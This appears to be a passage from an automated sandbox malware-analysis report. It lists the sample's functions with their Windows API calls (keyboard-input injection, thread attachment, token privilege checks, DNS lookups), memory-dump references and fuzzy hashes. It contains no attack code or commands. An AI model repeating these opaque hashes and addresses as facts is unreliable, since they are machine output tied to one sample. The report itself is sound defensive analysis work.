Instruction ID: adb11c63a6952477ae2ff3a3ea6434f1aeffd7ea91624f191e2aafef0af65cac
Opcode Fuzzy Hash: 299f0acf27ebcb935bf52e1c339f63ea4bfe06c22bfdd1b01191191e18e746e0
Instruction Fuzzy Hash: 8F31BC72A0021AABDF259F64DC85DAE7BE5EB54B10F0641B9FC04D7250EB35CE50CB90

Function 00488851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004888DE

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
Instruction ID: 90478ffdb7761b137305382920b909693c76b6b3f52a4c92a5928a084f4746aa
Opcode Fuzzy Hash: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
Instruction Fuzzy Hash: FA31E574600109AEEB20BA18CC45FBE77A4FB09310FD4492FF911E62A1CB78A9409B5F

Function 0048AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0048AB60
GetWindowRect.USER32(?,?), ref: 0048ABD6
PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
MessageBeep.USER32(00000000), ref: 0048AC57

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
Instruction ID: 50dfaebed92d8c5328ac5b6136a8f20cc44f4ea80b7df437f97558f7e7d7bb38
Opcode Fuzzy Hash: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
Instruction Fuzzy Hash: BA419130600118DFEB11EF58D884A6E7BF5FB48300F1888BBE9149B361D7B4E861CB5A

Function 00460AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00460B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 00460B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00460BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00460BFB

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
Instruction ID: 03210f4579a9838ef25ae451a3721c68a31d2690f75eb3d3b5678938ddfb0b3b
Opcode Fuzzy Hash: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
Instruction Fuzzy Hash: 65315970D402086EFB308AA98C05BFFBBA5AB45718F08826BE491512D2E37DA945975F

Function 00460C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00460C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 00460C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 00460CE1
SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00460D33

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
Instruction ID: af81f782b9f2afb763cf5164547ef1363043bc47ca8f91e08b3a13bd089ac861
Opcode Fuzzy Hash: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
Instruction Fuzzy Hash: 963135309402086EFF388B658804BBFBB66EB45310F04472FE481622D1E33D9949D75B

Function 004361C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004361FB
__isleadbyte_l.LIBCMT ref: 00436229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00436257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043628D

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
Instruction ID: a268d3a3e6e94a3a382490fbdf87b59e774afa85b5b6ffc4d13239602402ad5c
Opcode Fuzzy Hash: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
Instruction Fuzzy Hash: 8831E230600246BFDF219F65CC48B6B7BB9BF4A310F17906AE82487291DB34D850D754

Function 00484EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00484F02

Part of subcall function 00463641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046365B
Part of subcall function 00463641: GetCurrentThreadId.KERNEL32 ref: 00463662
Part of subcall function 00463641: AttachThreadInput.USER32(00000000,?,00465005), ref: 00463669

GetCaretPos.USER32(?), ref: 00484F13
ClientToScreen.USER32(00000000,?), ref: 00484F4E
GetForegroundWindow.USER32 ref: 00484F54

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
Instruction ID: 1d2def75fb9c8d520c96e6582531674793c8a8545b0fc50cd96dbe06c6996e1e
Opcode Fuzzy Hash: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
Instruction Fuzzy Hash: 38314FB2D00108AFCB00EFA6C8819EFB7F9EF84304F00446EE515E7242EA759E058BA5

Function 0048C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

GetCursorPos.USER32(?), ref: 0048C4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0043B9AB,?,?,?,?,?), ref: 0048C4E7
GetCursorPos.USER32(?), ref: 0048C534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0043B9AB,?,?,?), ref: 0048C56E

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
Instruction ID: 2973952025af683afbaf652597196eb0b77ee17814688135882e4792ee887bd6
Opcode Fuzzy Hash: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
Instruction Fuzzy Hash: CE319335500028FFCF159F58C898EAF7BB5EB09310F44486AF9059B361C735AD50DBA8

Function 00458656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
Part of subcall function 0045810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
Part of subcall function 0045810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
Part of subcall function 0045810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004586A3
_memcmp.LIBCMT ref: 004586C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004586FC
HeapFree.KERNEL32(00000000), ref: 00458703

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
Instruction ID: 730e04a0c9a28b219d77ec22e6a84493cb1498a8cd35620125a6bebab32f77ad
Opcode Fuzzy Hash: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
Instruction Fuzzy Hash: E4215A71E01109EBDB10DFA4C989BAEB7B8EF45306F15405EE844AB242DB34AE09CB58

Function 0042098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 004209AE

Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50

_fprintf.LIBCMT ref: 004209E5
OutputDebugStringW.KERNEL32(?), ref: 00455DBB

Part of subcall function 00424AAA: _flsall.LIBCMT ref: 00424AC3

__setmode.LIBCMT ref: 00420A1A

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
Instruction ID: 506474fa098cb1490a8c63a0929ef03edd2b6c88ff5c0dc42923ee6bdce5b67a
Opcode Fuzzy Hash: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
Instruction Fuzzy Hash: E31126727041146FDB04B2A5BC469BE77A8DF81318FA0416FF105632C3EE3C5946879D

Function 004350E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00435101

Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00D40000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
Instruction ID: 565aca9384bc55ec46628ce6f4316e74187f5c3bb682111b66b5609c454c8c26
Opcode Fuzzy Hash: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
Instruction Fuzzy Hash: D411E072E01A21AECF313FB1BC05B5E3B989B183A5F50593FF9049A250DE3C89418B9C

Function 004044A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004044CF

Part of subcall function 0040407C: _memset.LIBCMT ref: 004040FC
Part of subcall function 0040407C: _wcscpy.LIBCMT ref: 00404150
Part of subcall function 0040407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160

KillTimer.USER32(?,00000001,?,?), ref: 00404524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00404533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0043D4B9

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
Instruction ID: dcb2c65cf3c1a774e1d203f737fabc32089307ed9affa8f53aec521d9447171b
Opcode Fuzzy Hash: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
Instruction Fuzzy Hash: 6F21FBB0904754AFE7328B249C45BEBBBEC9B55318F0404AFE79A56281C3782984CB49

Function 00476369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50

gethostbyname.WSOCK32(?), ref: 00476399
WSAGetLastError.WSOCK32(00000000), ref: 004763A4
_memmove.LIBCMT ref: 004763D1
inet_ntoa.WSOCK32(?), ref: 004763DC

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: ebe779451b8fe17377772976d37213f5a324d7049d93d61360c19b924476f115
Instruction ID: c304d0e6e06ed5b692ae79d4b0fe9c52f6c8e6d6f1456e813eafe14ad56adccd
Opcode Fuzzy Hash: ebe779451b8fe17377772976d37213f5a324d7049d93d61360c19b924476f115
Instruction Fuzzy Hash: F2114F71600109AFCB00FBA5D946CEE77B9EF04314B54847AF505B72A2DB389E14CB69

Function 00458B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00458B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458BA4

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
Instruction ID: 6d6e4feeaee75d02a1ec4dd614e497ad2765f264ac6e3ed00c825e9843e5ba14
Opcode Fuzzy Hash: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
Instruction Fuzzy Hash: 56113A79900218BFDB10DB95C884EAEBB78EB48710F2041A6E900B7250DA716E15DB94

Function 00401290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
GetClientRect.USER32(?,?), ref: 0043B5FB
GetCursorPos.USER32(?), ref: 0043B605
ScreenToClient.USER32(?,?), ref: 0043B610

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
Instruction ID: ee9d34d9398b5f91fab5137b757b2ab9dbcc007e8162b1c14587a54292e2d527
Opcode Fuzzy Hash: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
Instruction Fuzzy Hash: 39112B39510059FBCB00EF99D8899AE77B8FB05300F4008AAF901F7291D734BA569BA9

Function 00B9218B Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00B915D8,00000000,00000000,?,00B92132,00B915D8,00000000,00000000,00000000,?,00B92283,00000006,FlsSetValue), ref: 00B921BD
GetLastError.KERNEL32(?,00B92132,00B915D8,00000000,00000000,00000000,?,00B92283,00000006,FlsSetValue,00BA6FC4,FlsSetValue,00000000,00000364,?,00B9192D), ref: 00B921C9
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B92132,00B915D8,00000000,00000000,00000000,?,00B92283,00000006,FlsSetValue,00BA6FC4,FlsSetValue,00000000), ref: 00B921D7

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: f50742b428ed32995369b6096df418ae14faa92b08083662a1cacede5ac8bf81
Instruction ID: aaf66739b2785fec1a21c0c370482c7d269f03d638d8156ecda90ea3ab95cd4d
Opcode Fuzzy Hash: f50742b428ed32995369b6096df418ae14faa92b08083662a1cacede5ac8bf81
Instruction Fuzzy Hash: 9C018472A41232BBCB214B68EC45A667BD8EF47BA1B214670EA16F7150DB20DD11C6F0

Function 00436FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00436FDB

Part of subcall function 004376C2: __fltout2.LIBCMT ref: 004376EB

__cftog_l.LIBCMT ref: 00437001
__cftoe_l.LIBCMT ref: 00437033

